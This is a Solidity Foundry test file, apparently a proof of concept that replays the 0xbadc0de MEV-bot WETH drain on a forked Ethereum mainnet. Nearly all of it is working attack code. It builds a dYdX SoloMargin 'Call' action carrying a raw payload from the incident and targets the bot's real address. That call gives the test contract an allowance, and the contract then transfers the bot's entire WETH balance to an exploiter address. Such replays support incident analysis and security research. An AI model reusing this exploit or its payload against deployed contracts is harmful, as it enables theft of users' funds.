// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
/**
* POC built by
* - https://twitter.com/kayaba2002
* - https://twitter.com/eugenioclrc
*/
/// @dev Local mirror of the dYdX SoloMargin argument types needed to build an
/// `operate` call. Field order inside each struct and member order inside each
/// enum are ABI-significant: the pool decodes by position, so nothing here may
/// be reordered or the encoded action would change meaning.
interface Structs {
struct Val {
uint256 value;
}
/// @dev Action selector for `operate`. Only `Call` is used by this PoC; the
/// member order matches the upstream contract so `Call` keeps its index.
enum ActionType {
Deposit, // supply tokens
Withdraw, // borrow tokens
Transfer, // transfer balance between accounts
Buy, // buy an amount of some token (externally)
Sell, // sell an amount of some token (externally)
Trade, // trade tokens against another account
Liquidate, // liquidate an undercollateralized or expiring account
Vaporize, // use excess tokens to zero-out a completely negative account
Call // send arbitrary data to an address
}
// NOTE(review): declared with a single member so it encodes as 0; the upstream
// dYdX enum presumably has further members — fine for this PoC, confirm before reuse.
enum AssetDenomination {
Wei // the amount is denominated in wei
}
// NOTE(review): same single-member truncation as AssetDenomination (encodes as 0).
enum AssetReference {
Delta // the amount is given as a delta from the current value
}
/// @dev Signed amount attached to an action; this PoC passes a zero amount.
struct AssetAmount {
bool sign; // true if positive
AssetDenomination denomination;
AssetReference ref;
uint256 value;
}
/// @dev One action for `operate`. For `Call`, `otherAddress` is the contract
/// the pool calls into and `data` is the payload handed to it.
struct ActionArgs {
ActionType actionType;
uint256 accountId;
AssetAmount amount;
uint256 primaryMarketId;
uint256 secondaryMarketId;
address otherAddress;
uint256 otherAccountId;
bytes data;
}
/// @dev Account identifier passed to `operate`; `owner` is the caller-chosen
/// account owner (this PoC uses its own address).
struct Info {
address owner; // The address that owns the account
uint256 number; // A nonce that allows a single address to control many accounts
}
/// @dev Signed balance as returned by `getAccountWei`. Distinct from the
/// `AssetDenomination.Wei` enum member despite the shared name.
struct Wei {
bool sign; // true if positive
uint256 value;
}
}
/// @dev Duplicate of `Structs.Info`. Nothing in this file references
/// `Account.Info` — `DyDxPool` inherits `Info` from `Structs` — so this library
/// appears to be a leftover from the upstream dYdX interface and is unused here.
library Account {
struct Info {
address owner;
uint256 number;
}
}
/// @dev Minimal dYdX SoloMargin surface used by the PoC. `Info`, `Wei` and
/// `ActionArgs` resolve through the inherited `Structs` declarations.
interface DyDxPool is Structs {
/// @dev Read-only balance query; declared here but not called by this file.
function getAccountWei(Info memory account, uint256 marketId) external view returns (Wei memory);
/// @dev Executes a batch of actions on the given accounts. `ContractTest.testExploit`
/// submits a single `Call` action through this entrypoint.
function operate(Info[] memory, ActionArgs[] memory) external;
}
/**
 * Foundry reproduction of the 0xbadc0de MEV-bot WETH drain, replayed on a
 * mainnet fork pinned at block 15625424 (see setUp).
 *
 * What this file shows: one dYdX `Call` action targeting MEVBOT is submitted
 * through `pool.operate`; afterwards the bot holds a WETH allowance for this
 * contract (logged before the transfer), which is then spent with
 * `transferFrom` to move the bot's entire balance to `exploiter`.
 * Why the `Call` results in that allowance is not established on this page —
 * the payload below is left undocumented by the authors, who only note that
 * the bot calls back into this contract's fallback.
 *
 * NOTE(review): the defensive reading (inferred, not proven here) is that a
 * contract exposing a dYdX callback must verify `msg.sender` is the pool and
 * that the account owner is trusted before acting on caller-supplied data;
 * confirm against the bot's bytecode before citing this as the root cause.
 */
contract ContractTest is Test {
// Mainnet WETH9; the asset that is drained.
IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
DyDxPool pool = DyDxPool(0x1E0447b19BB6EcFdAe1e4AE1694b0C3659614e4e); //this is dydx solo margin sc
// Recipient of the drained WETH; derived in setUp.
address exploiter;
// Victim contract: the MEV bot whose WETH balance is moved.
address MEVBOT = 0xbaDc0dEfAfCF6d4239BDF0b66da4D7Bd36fCF05A;
// Foundry cheatcode address (HEVM).
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
/// @dev Derives the recipient address from private key 31337 and pins the
/// fork so the replay is deterministic.
function setUp() public {
exploiter = cheats.addr(31337);
// fork mainnet at block 15625424
cheats.createSelectFork("mainnet", 15625424);
}
/// @dev Replays the incident: one `Call` action via dYdX, then spend the
/// resulting allowance. Passes when the bot's WETH balance reaches zero.
function testExploit() public {
emit log_named_decimal_uint("MEV Bot balance before exploit:", weth.balanceOf(MEVBOT), 18);
// Single dYdX account owned by this test contract.
Structs.Info[] memory _infos = new Structs.Info[](1);
_infos[0] = Structs.Info({owner: address(this), number: 1});
// Single action: a `Call` with a zero amount whose target is MEVBOT.
Structs.ActionArgs[] memory _args = new Structs.ActionArgs[](1);
_args[0] = Structs.ActionArgs(
// ActionType actionType;
Structs.ActionType.Call,
// uint256 accountId;
0,
// AssetAmount amount;
Structs.AssetAmount(
// bool sign; // true if positive
false,
// AssetDenomination denomination;
Structs.AssetDenomination.Wei,
// AssetReference ref;
Structs.AssetReference.Delta,
// uint256 value;
0
),
// uint256 primaryMarketId;
0,
// uint256 secondaryMarketId;
0,
// address otherAddress;
MEVBOT,
// uint256 otherAccountId;
0,
// bytes data;
//abi.encodeWithSignature("approve(address,uint256)", address(this), type(uint256).max)
// Raw payload replayed from the incident; the authors did not document how
// the bot interprets it, and it is left unexplained here. The only
// addresses it embeds are the pool, this contract and WETH.
bytes.concat(
abi.encode(
0x0000000000000000000000000000000000000000000000000000000000000003,
address(pool),
0x0000000000000000000000000000000000000000000000000000000000000000,
0x0000000000000000000000000000000000000000000000000000000000000000,
0x0000000000000000000000000000000000000000000000000000000000000000,
0x00000000000000000000000000000000000000000000000000000000000000e0,
0x000000000000000000000000000000000000000000000beff1ceef246ef7bd1f,
0x0000000000000000000000000000000000000000000000000000000000000001,
0x0000000000000000000000000000000000000000000000000000000000000020,
0x0000000000000000000000000000000000000000000000000000000000000000,
0x0000000000000000000000000000000000000000000000000000000000000000,
address(this),
address(weth)
),
abi.encode(
0x00000000000000000000000000000000000000000000000000000000000000a0,
address(this),
0x0000000000000000000000000000000000000000000000000000000000000040,
0x00000000000000000000000000000000000000000000000000000000000000a0,
0x0000000000000000000000000000000000000000000000000000000000000004,
0x4798ce5b00000000000000000000000000000000000000000000000000000000,
0x0000000000000000000000000000000000000000000000000000000000000002,
0x0000000000000000000000000000000000000000000000000000000000000004,
0x0000000000000000000000000000000000000000000000000000000000000001,
0x0000000000000000000000000000000000000000000000000000000000000001,
0x0000000000000000000000000000000000000000000000000000000000000002,
0x0000000000000000000000000000000000000000000000000000000000000002
)
)
);
pool.operate(_infos, _args);
// The allowance logged here is what makes the transferFrom below succeed.
emit log_named_decimal_uint("Contract BADCODE WETH Allowance", weth.allowance(MEVBOT, address(this)), 18);
weth.transferFrom(MEVBOT, exploiter, weth.balanceOf(MEVBOT));
emit log_named_decimal_uint("MEV Bot WETH balance After exploit:", weth.balanceOf(MEVBOT), 18);
emit log_named_decimal_uint("Exploiter WETH balance After exploit:", weth.balanceOf(exploiter), 18);
// Success criterion: the bot holds no WETH after the replay.
assertEq(weth.balanceOf(MEVBOT), 0);
}
/**
 * For some reason it calls a 00000000 function on our contract.
 * By changing values on the encode args we can probably change the func signature.
 * Meanwhile we can add a fallback and run our logic in there.
 *
 * ContractTest::00000000(000000000000000000000000000000000000000000000000000000044798ce5b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000beff1ceef246ef7bd1f00000000000000000000000000000000000000000000000000000001)
 */
// Empty, non-payable fallback: presumably present so the bot's callback with
// selector 0x00000000 (see the trace above) lands here without reverting.
fallback() external {}
}